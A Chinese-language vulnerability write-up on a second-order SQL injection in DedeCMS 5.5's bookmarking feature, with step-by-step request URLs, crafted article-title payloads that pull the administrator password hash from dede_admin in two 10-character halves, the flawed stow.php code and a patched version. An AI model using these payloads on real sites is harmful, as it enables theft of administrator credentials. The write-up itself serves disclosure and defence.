catalog
1. 漏洞描述 2. 漏洞觸發條件 3. 漏洞影響範圍 4. 漏洞程式碼分析 5. 防禦方法 6. 攻防思考
1. 漏洞描述
收藏文章功能$title變數未過濾,造成二次注入
Relevant Link:
http://www.wooyun.org/bugs/wooyun-2013-046375
2. 漏洞觸發條件
0x1: 釋出一個特殊構造標題的文章
http://127.0.0.1/dedecms5.5/member/content_list.php?channelid=1 //文章標題如下,目的是額外注入了一條可以查詢出管理員密碼的SQL語句 u',char(@`'`), (select pwd from dede_admin))#
0x2: 提交收藏請求
獲取剛才釋出文章的aid。例如aid=108,針對這篇文章發起收藏請求 http://localhost/dedecms5.5/plus/stow.php?aid=108&type=001
0x3: 發起剛才釋出的文章的"推薦"請求
http://localhost/dedecms5.5/member/mystow.php //點選剛才釋出的文章的"推薦"連結,開啟如下連線 http://localhost/dedecms5.5/plus/recommend.php?type=29a53fb3c3&aid=108 //其中type=29a53fb3c3的"29a53fb3c3"為向dede_admin.pwd欄位的前10位,這個時候二次注入就已經發生了
0x4: 注入後10位
後10位使用類似的步驟,不同的是釋出的文章標題為 u',char(@`'`),substring((select pwd from dede_admin),11))#
Relevant Link:
http://www.wooyun.org/bugs/wooyun-2013-046375
3. 漏洞影響範圍
4. 漏洞程式碼分析
/plus/stow.php
.. $row = $dsql->GetOne("Select * From `#@__member_stow` where aid='$aid' And mid='{$ml->M_ID}' "); if(!is_array($row)) { //這裡的TITLE是從資料庫裡查詢出來的,也就是我們釋出的文章的標題 $dsql->ExecuteNoneQuery(" INSERT INTO `#@__member_stow`(mid,aid,title,addtime) VALUES ('".$ml->M_ID."','$aid','".$title."','$addtime'); "); } ..
Relevant Link:
http://www.wooyun.org/bugs/wooyun-2014-048913
5. 防禦方法
/plus/stow.php
<?php require_once(dirname(__FILE__)."/../include/common.inc.php"); $aid = ( isset($aid) && is_numeric($aid) ) ? $aid : 0; $type=empty($type)? "" : HtmlReplace($type,1); if($aid==0) { ShowMsg('文件id不能為空!','javascript:window.close();'); exit(); } require_once(DEDEINC."/memberlogin.class.php"); $ml = new MemberLogin(); if($ml->M_ID==0) { ShowMsg('只有會員才允許收藏操作!','javascript:window.close();'); exit(); } //讀取文件資訊 $arcRow = GetOneArchive($aid); if($arcRow['aid']=='') { ShowMsg("無法收藏未知文件!","javascript:window.close();"); exit(); } extract($arcRow, EXTR_SKIP); /**/ $title = HtmlReplace($title,1); $aid = intval($aid); /**/ $addtime = time(); if($type==''){ $row = $dsql->GetOne("Select * From `#@__member_stow` where aid='$aid' And mid='{$ml->M_ID}' AND type='' "); if(!is_array($row)) { $dsql->ExecuteNoneQuery("INSERT INTO `#@__member_stow`(mid,aid,title,addtime) VALUES ('".$ml->M_ID."','$aid','".addslashes($arctitle)."','$addtime'); "); } }else{ $row = $dsql->GetOne("Select * From `#@__member_stow` where type='$type' and (aid='$aid' And mid='{$ml->M_ID}')"); if(!is_array($row)){ $dsql->ExecuteNoneQuery(" INSERT INTO `#@__member_stow`(mid,aid,title,addtime,type) VALUES ('".$ml->M_ID."','$aid','$title','$addtime','$type'); "); } } //更新使用者統計 $row = $dsql->GetOne("SELECT COUNT(*) AS nums FROM `#@__member_stow` WHERE `mid`='{$ml->M_ID}' "); $dsql->ExecuteNoneQuery("UPDATE #@__member_tj SET `stow`='$row[nums]' WHERE `mid`='".$ml->M_ID."'"); ShowMsg('成功收藏一篇文件!','javascript:window.close();'); ?>
6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved